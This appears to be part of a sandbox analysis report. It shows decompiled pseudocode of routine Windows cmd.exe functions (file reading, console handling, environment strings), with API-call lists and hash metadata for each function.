                                    • Instruction Fuzzy Hash: B7316B71A0021E57DF29DAA5DC58BEEBBB8EF54358F0401ADFA05D3141DB749E80CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 48%
                                    			E011F8E52(intOrPtr __edx, long _a4, DWORD* _a8) {
                                    				void _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				void* __ecx;
                                    				void _t29;
                                    				long _t38;
                                    				void* _t39;
                                    				signed int _t45;
                                    				long _t46;
                                    				void* _t52;
                                    				void* _t54;
                                    				intOrPtr _t57;
                                    				void _t60;
                                    				long _t61;
                                    
                                    				_v16 = _v16 & 0x00000000;
                                    				_v20 = _v20 & 0x00000000;
                                    				_push(_t39);
                                    				_push(_t39);
                                    				_v12 = __edx;
                                    				_t54 = 2;
                                    				_t61 = E011D5DB5(_t39, _t54);
                                    				if(_t61 == 0xffffffff) {
                                    					_t52 = 0x6e;
                                    					E011F985A(_t52);
                                    					L2:
                                    					E011F85E9(0, 1);
                                    				}
                                    				_t38 = _a4;
                                    				while(1) {
                                    					_t23 =  &_v8;
                                    					__imp___get_osfhandle(0);
                                    					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
                                    						break;
                                    					}
                                    					_t57 = _v12;
                                    					_t29 = _v8;
                                    					_t60 = _t29;
                                    					_t45 =  *(_t57 + 0x1c);
                                    					if((_t45 & 0x0000c000) == 0) {
                                    						if(_t60 <= 2) {
                                    							L9:
                                    							_t45 = _t45 | 0x00008000;
                                    						} else {
                                    							_t57 = _v12;
                                    							if( *_t38 != 0xfeff) {
                                    								goto L9;
                                    							} else {
                                    								_t45 = _t45 | 0x00004000;
                                    							}
                                    						}
                                    						 *(_t57 + 0x1c) = _t45;
                                    					}
                                    					if(_t60 == 0) {
                                    						_t46 = _v16;
                                    					} else {
                                    						asm("sbb ecx, ecx");
                                    						_t46 = E011F6CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
                                    						_t29 = _v8;
                                    						_v16 = _t46;
                                    					}
                                    					if(_t29 == _a8) {
                                    						continue;
                                    					}
                                    					if(_t46 == 0) {
                                    						_t31 = _t29 - _t60;
                                    						__imp___get_osfhandle(1);
                                    						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
                                    					}
                                    					return _t61;
                                    				}
                                    				 *0x1213cf0 = GetLastError();
                                    				E011DDB92(_t61);
                                    				_push(0);
                                    				_push( *0x1213cf0);
                                    				E011DC5A2(_t61);
                                    				goto L2;
                                    			}



















                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F8E99
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F8EA1
                                    • _get_osfhandle.MSVCRT ref: 011F8F27
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 011F8F2F
                                      • Part of subcall function 011F85E9: longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86B6
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86E4
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F8712
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F8F40
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                    • String ID:
                                    • API String ID: 288106245-0
                                    • Opcode ID: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                    • Instruction ID: 23731189a15aac567ff3350d6f0802bc93be1c5c9a511d952ba88e2b1329f2a5
                                    • Opcode Fuzzy Hash: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                    • Instruction Fuzzy Hash: 0C31D171E10219AFEF2CDF69D859BAE77AAEB94324F10812EE601C72C5DF7099408B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E011D5712(void* __ecx, long __edx, DWORD* _a4, struct _OVERLAPPED* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                                    				char _v8;
                                    				intOrPtr _v16;
                                    				void* _t19;
                                    				signed int _t26;
                                    				void* _t31;
                                    				void* _t32;
                                    				intOrPtr* _t33;
                                    				signed int _t43;
                                    				intOrPtr _t52;
                                    				void* _t54;
                                    				struct _OVERLAPPED* _t55;
                                    				void* _t58;
                                    				void* _t59;
                                    
                                    				_t55 = _a8;
                                    				_t33 = __edx;
                                    				_v8 = 0;
                                    				_t59 = __ecx;
                                    				 *0x11fd5cc = 0;
                                    				__imp___get_osfhandle(0, _t54, _t58, _t32, __ecx, __ecx);
                                    				if(ReadFile(0, __ecx, __edx, _a4, _t55) == 0) {
                                    					L18:
                                    					 *0x1213cf0 = GetLastError();
                                    					_t19 = E011E0178(E011DDB92(_t59));
                                    					E011DDB92(_a16);
                                    					if(_t19 == 0) {
                                    						DeleteFileW(_a20);
                                    					}
                                    					E011F85E9( *0x1213cf0, 1);
                                    					asm("int3");
                                    					E011E1040(_v8, _t55, _v16);
                                    					return 0;
                                    				} else {
                                    					_t43 = _t55->Internal;
                                    					if(_t43 == 0) {
                                    						if(GetLastError() == 0x3e3) {
                                    							goto L18;
                                    						} else {
                                    							_t43 = _t55->Internal;
                                    							if(_t43 != 0) {
                                    								goto L2;
                                    							} else {
                                    								 *0x1213cf0 =  *0x1213cf0 & _t43;
                                    								_t31 = 0;
                                    							}
                                    							goto L5;
                                    						}
                                    					} else {
                                    						L2:
                                    						_t52 = _a12;
                                    						_t26 =  *(_t52 + 0x1c);
                                    						if((_t26 & 0x0000c000) == 0) {
                                    							if(_t43 < 2 ||  *_t33 != 0xfeff) {
                                    								_t26 = _t26 | 0x00008000;
                                    							} else {
                                    								_t26 = _t26 | 0x00004000;
                                    							}
                                    							 *(_t52 + 0x1c) = _t26;
                                    						}
                                    						if((_t26 & 0x00008002) == 0x8002) {
                                    							E011F6CEF(1, _t33, _t55,  &_v8);
                                    							if(_t55->Internal != _t55->Internal) {
                                    								 *0x11fd5cc = 1;
                                    							}
                                    						}
                                    						_t31 = 1;
                                    						L5:
                                    						return _t31;
                                    					}
                                    				}
                                    			}

















                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011D5734
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 011D573C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E96FE
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E974A
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011E9775
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                    • String ID:
                                    • API String ID: 3588551418-0
                                    • Opcode ID: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                    • Instruction ID: 94303b79d4cea92381e1c686a523375f7286b7d0a4788e33adbbe26041e15c91
                                    • Opcode Fuzzy Hash: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                    • Instruction Fuzzy Hash: DA31B135A00506DBEF2CDF69E85C97A7BBAFB94259B624429E902C7294DF309C40CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E011E6A96(short __ecx) {
                                    				signed int _v8;
                                    				short _v14;
                                    				short _v16;
                                    				short _v18;
                                    				short _v20;
                                    				long _v28;
                                    				char _v32;
                                    				int _v36;
                                    				void _v556;
                                    				long _v564;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t22;
                                    				short _t34;
                                    				short _t35;
                                    				int _t38;
                                    				WCHAR* _t39;
                                    				void* _t50;
                                    				short _t51;
                                    				DWORD* _t52;
                                    				signed int _t54;
                                    
                                    				_t22 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t22 ^ _t54;
                                    				_v32 = 1;
                                    				_t52 = 0;
                                    				_v28 = 0x104;
                                    				_v36 = 0;
                                    				_t51 = __ecx;
                                    				memset( &_v556, 0, 0x104);
                                    				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
                                    					_t34 = 0x3a;
                                    					_v18 = _t34;
                                    					_t35 = 0x5c;
                                    					_v16 = _t35;
                                    					_v14 = 0;
                                    					_v20 = _t51;
                                    					_t38 = GetDriveTypeW( &_v20);
                                    					if(_t38 <= 1) {
                                    						L8:
                                    						_t52 = 1;
                                    					} else {
                                    						if(_t38 != 2 && _t38 != 5) {
                                    							_t39 = _v36;
                                    							if(_t39 == 0) {
                                    								_t39 =  &_v556;
                                    							}
                                    							if(GetVolumeInformationW( &_v20, _t39, _v28,  &_v564, _t52, _t52, _t52, _t52) == 0) {
                                    								if(GetLastError() == 5) {
                                    									goto L8;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t52, 0x104, _v8 ^ _t54, _t50, _t51, _t52, _v36);
                                    			}


























                                    APIs
                                    • memset.MSVCRT ref: 011E6ACB
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 011E6B0F
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 011E6B3E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6B4F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DriveInformationTypeVolume
                                    • String ID:
                                    • API String ID: 285405857-0
                                    • Opcode ID: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                    • Instruction ID: 86f3d03b8a6e16212ce5322eb9d1fbbe6b5c0d355f4806a6a26269132e3a02a2
                                    • Opcode Fuzzy Hash: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                    • Instruction Fuzzy Hash: 8C21A371E00118ABDF28DBE8DC4DAEFBBB8EF15754F44056AE505E3150EB359A40CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 24%
                                    			E011E0662(signed short** __ecx) {
                                    				signed int _v8;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t4;
                                    				void* _t6;
                                    				long _t8;
                                    				signed int _t11;
                                    				void* _t12;
                                    				signed int _t15;
                                    				long _t16;
                                    				void* _t17;
                                    				void* _t20;
                                    				void* _t24;
                                    				signed short** _t30;
                                    				void* _t31;
                                    				long _t33;
                                    				void* _t34;
                                    				signed int _t35;
                                    
                                    				_push(__ecx);
                                    				_t4 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t4 ^ _t35;
                                    				_push(_t15);
                                    				_t30 = __ecx;
                                    				_t28 = 0x8000;
                                    				_t19 =  *__ecx;
                                    				_t6 = E011DD120( *__ecx, 0x8000, __ecx);
                                    				_t16 = _t15 | 0xffffffff;
                                    				while(1) {
                                    					_t33 = _t6;
                                    					if(_t33 != _t16) {
                                    						break;
                                    					}
                                    					if( *0x1213cf0 != 2) {
                                    						_t20 = 0x6e;
                                    						E011F985A(_t20);
                                    						goto L12;
                                    					} else {
                                    						_t11 =  *( *_t30) & 0x0000ffff;
                                    						if(_t11 == 0x41 || _t11 == 0x42) {
                                    							_t12 = E011DC5A2(_t19);
                                    							_t24 = 0x2341;
                                    							__imp___getch(0);
                                    							if(_t12 == 3) {
                                    								EnterCriticalSection( *0x1203858);
                                    								 *0x11fd544 = 1;
                                    								LeaveCriticalSection( *0x1203858);
                                    								goto L12;
                                    							} else {
                                    								_t19 =  *_t30;
                                    								_t28 = 0x8000;
                                    								_t6 = E011DD120( *_t30, 0x8000, _t24);
                                    								continue;
                                    							}
                                    						} else {
                                    							_push(0);
                                    							_push(0x236c);
                                    							E011DC5A2(_t19);
                                    							L12:
                                    							_t8 = _t16;
                                    						}
                                    					}
                                    					L3:
                                    					_pop(_t31);
                                    					_pop(_t34);
                                    					_pop(_t17);
                                    					return E011E6FD0(_t8, _t17, _v8 ^ _t35, _t28, _t31, _t34);
                                    				}
                                    				__imp___get_osfhandle(0);
                                    				SetFilePointer(_t6, _t33, _t30[2], 0);
                                    				_t8 = _t33;
                                    				goto L3;
                                    			}























                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0699
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D69F2,?,00000001,?,?,00000000), ref: 011E06A1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FilePointer_get_osfhandle
                                    • String ID:
                                    • API String ID: 1013686580-0
                                    • Opcode ID: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                    • Instruction ID: a71ef4aaead2248e08f059e014b95d27990d2079652d11dd5acb87c48134e80e
                                    • Opcode Fuzzy Hash: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                    • Instruction Fuzzy Hash: D7110232200606AFEB3CABACBC5DB2A7BE5EB58364F200519F105971C4CFA29980C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E011F7EC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				signed int _v8;
                                    				signed int _v30;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                    				struct _CHAR_INFO _v36;
                                    				struct _COORD _v40;
                                    				struct _SMALL_RECT _v48;
                                    				signed int _t19;
                                    				union %anon259 _t30;
                                    				void* _t42;
                                    				void* _t49;
                                    				void* _t50;
                                    				void* _t52;
                                    				signed int _t53;
                                    
                                    				_t51 = __esi;
                                    				_t50 = __edi;
                                    				_t49 = __edx;
                                    				_t42 = __ebx;
                                    				_t19 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t19 ^ _t53;
                                    				if(E011E0178(_t19 ^ _t53) != 0) {
                                    					_push(__esi);
                                    					_t52 = GetStdHandle(0xfffffff5);
                                    					if(GetConsoleScreenBufferInfo(_t52,  &_v32) != 0) {
                                    						_v40.Y =  ~_v30;
                                    						_v40.X = 0;
                                    						_v48.Left = 0;
                                    						_v48.Bottom = _v30;
                                    						_v48.Right = _v32.dwSize;
                                    						_t30 = 0x20;
                                    						_v36.UnicodeChar = _t30;
                                    						_v36.Attributes = _v32.wAttributes;
                                    						ScrollConsoleScreenBufferW(_t52,  &_v48, 0, _v40,  &_v36);
                                    						_v32.dwCursorPosition = 0;
                                    						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0);
                                    					} else {
                                    						E011E25D9(0x11d3c88);
                                    					}
                                    					_pop(_t51);
                                    				} else {
                                    					E011E25D9(0x11d3c88);
                                    				}
                                    				return E011E6FD0(0, _t42, _v8 ^ _t53, _t49, _t50, _t51);
                                    			}
















                                    APIs
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F7EF1
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F7EFE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                    • String ID:
                                    • API String ID: 2847887402-0
                                    • Opcode ID: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                    • Instruction ID: e12c5198fc3f268a288462e2deeb706a6c92e8849a782baa7016f011173683a3
                                    • Opcode Fuzzy Hash: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                    • Instruction Fuzzy Hash: 0B212E7591420A9ACF14EFF4A918AFEB7B8EF1C614F10011AE915E7180EB349981876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E46D8() {
                                    				int _t3;
                                    				signed int _t6;
                                    				void* _t7;
                                    				void* _t8;
                                    				signed int _t10;
                                    				signed int _t13;
                                    				signed char* _t15;
                                    				void* _t17;
                                    				void* _t18;
                                    
                                    				_t3 = GetConsoleOutputCP();
                                    				 *0x1203854 = _t3;
                                    				if(GetCPInfo(_t3, 0x1203840) == 0) {
                                    					_t6 = GetThreadLocale() & 0x000003ff;
                                    					if(_t6 != 0x11) {
                                    						if(_t6 == 4 || _t6 == 0x12) {
                                    							 *0x1203846 = 0xfe81;
                                    						} else {
                                    							 *0x1203846 = 0;
                                    						}
                                    					} else {
                                    						 *0x1203846 = 0xfce09f81;
                                    						 *0x120384a = 0;
                                    					}
                                    				}
                                    				_t7 = memset(0x1217f30, 0, 0x100);
                                    				_t18 = _t17 + 0xc;
                                    				if( *0x1203846 != 0) {
                                    					_t15 = 0x1203846;
                                    					while(1) {
                                    						_t8 = _t15[1];
                                    						if(_t8 == 0) {
                                    							break;
                                    						}
                                    						_t13 =  *_t15 & 0x000000ff;
                                    						_t10 = _t8 & 0x000000ff;
                                    						if(_t13 <= _t10) {
                                    							_t8 = memset(0x1217f30 + _t13, 1, _t10 - _t13 + 1);
                                    							_t18 = _t18 + 0xc;
                                    						}
                                    						_t15 =  &(_t15[2]);
                                    						if( *_t15 != 0) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					return _t8;
                                    				} else {
                                    					return _t7;
                                    				}
                                    			}












                                    APIs
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                    • memset.MSVCRT ref: 011E4703
                                    • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EE8B8
                                    • memset.MSVCRT ref: 011EE92E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$ConsoleInfoLocaleOutputThread
                                    • String ID:
                                    • API String ID: 1263632223-0
                                    • Opcode ID: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                    • Instruction ID: 23d803f6c67ad00235022ed27ea3fdaad82514ab50e12a368eaad7b1648e3c5e
                                    • Opcode Fuzzy Hash: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                    • Instruction Fuzzy Hash: 4F118970D18A519FEB3EDF98B80D7713BC0BB10720F4802AAE5C15A58AF7A842C5C756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E011F3BB0(void* __eflags) {
                                    				signed int _v8;
                                    				char _v12;
                                    				void* __ecx;
                                    				void* _t7;
                                    				signed short _t13;
                                    				signed int _t14;
                                    				void* _t15;
                                    				void* _t22;
                                    				void* _t23;
                                    
                                    				_push(_t15);
                                    				_push(_t15);
                                    				_t23 = GetStdHandle(0xfffffff6);
                                    				_t7 = E011DC108(_t15, 0x232b, 0, _t22);
                                    				if(_t23 != 0) {
                                    					if(E011E0178(_t7) == 0 || ( *0x1213aa0 & 0x00000001) == 0) {
                                    						E011F3B11(_t23,  &_v8, 1,  &_v12);
                                    					} else {
                                    						_t13 = FlushConsoleInputBuffer(_t23);
                                    						__imp___getch();
                                    						_t14 = _t13 & 0x0000ffff;
                                    						_v8 = _t14;
                                    						if(_t14 == 3) {
                                    							EnterCriticalSection( *0x1203858);
                                    							 *0x11fd544 = 1;
                                    							LeaveCriticalSection( *0x1203858);
                                    						}
                                    					}
                                    				}
                                    				E011E25D9(L"\r\n");
                                    				return 0;
                                    			}












                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BBA
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BE9
                                    • _getch.MSVCRT ref: 011F3BEF
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C07
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C1D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                    • String ID:
                                    • API String ID: 491502236-0
                                    • Opcode ID: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction ID: abd1d2d664a651f4f02b1e5ca1b83fe43c9fe2bf23d56590595e316bbb62bdb6
                                    • Opcode Fuzzy Hash: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction Fuzzy Hash: 0B01D832514255AFDB2DEB65BC1DBAA7BA9FB10324F00025EFA1682084DFB18A80C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E3AAE() {
                                    				int _t9;
                                    				void* _t12;
                                    				WCHAR* _t13;
                                    
                                    				_t13 = GetEnvironmentStringsW();
                                    				_t12 = 0;
                                    				if(_t13 != 0) {
                                    					_t9 = E011E3B00(_t13);
                                    					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
                                    					if(_t12 != 0) {
                                    						memcpy(_t12, _t13, _t9);
                                    					}
                                    					FreeEnvironmentStringsW(_t13);
                                    				}
                                    				return _t12;
                                    			}






                                    APIs
                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                    • memcpy.MSVCRT ref: 011E3AE3
                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                    • String ID:
                                    • API String ID: 713576409-0
                                    • Opcode ID: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction ID: f84b0b0ddba6df0dee14cdd1735a99c968783b6c124e7ce4adbd897c6478f49f
                                    • Opcode Fuzzy Hash: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction Fuzzy Hash: 34E09273A0091167DA3166AE7C5CDAF6DAEEBD99657150058F91AC3204DF308CC246B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E011E5266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				int _v28;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				signed int _v56;
                                    				char _v60;
                                    				char** _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				void _v76;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				char _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				void _v124;
                                    				unsigned int _t115;
                                    				void* _t123;
                                    				intOrPtr _t129;
                                    				void* _t138;
                                    				signed int _t140;
                                    				signed int _t141;
                                    				signed int _t143;
                                    				signed int _t144;
                                    				signed int _t145;
                                    				intOrPtr _t146;
                                    				void* _t147;
                                    				intOrPtr _t152;
                                    				intOrPtr _t162;
                                    				char _t163;
                                    				char* _t164;
                                    				void* _t168;
                                    				void* _t172;
                                    				char* _t180;
                                    				char* _t181;
                                    				void* _t182;
                                    				signed int _t183;
                                    				signed int _t195;
                                    				void* _t196;
                                    				void* _t197;
                                    				intOrPtr* _t198;
                                    				intOrPtr _t203;
                                    				intOrPtr _t204;
                                    				intOrPtr _t210;
                                    				signed int _t211;
                                    				signed int _t216;
                                    				signed int _t218;
                                    				void* _t220;
                                    				void* _t222;
                                    				void* _t224;
                                    				void* _t225;
                                    				intOrPtr _t227;
                                    				intOrPtr _t231;
                                    
                                    				_t195 = __edx;
                                    				_v20 = __edx;
                                    				_t168 = __ecx;
                                    				_v28 = 0;
                                    				_v16 = 0;
                                    				_t227 =  *0x11fd544; // 0x0
                                    				if(_t227 != 0) {
                                    					L47:
                                    					return 1;
                                    				}
                                    				_t115 = _a12;
                                    				_v8 = _t115;
                                    				_t208 = _t115 >> 0x00000002 & 1;
                                    				_t123 = E011E5590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20, _a24, _a28, _a32);
                                    				if(_t123 == 0) {
                                    					_v16 = 1;
                                    					_t216 = _v8 & 0x00000001;
                                    					L4:
                                    					E011E0040( *((intOrPtr*)(_t168 + 0x18)));
                                    					 *((intOrPtr*)(_t168 + 0x18)) = 0;
                                    					_t231 =  *0x11fd544; // 0x0
                                    					if(_t231 != 0) {
                                    						goto L47;
                                    					}
                                    					if(_t216 == 0) {
                                    						return 0;
                                    					}
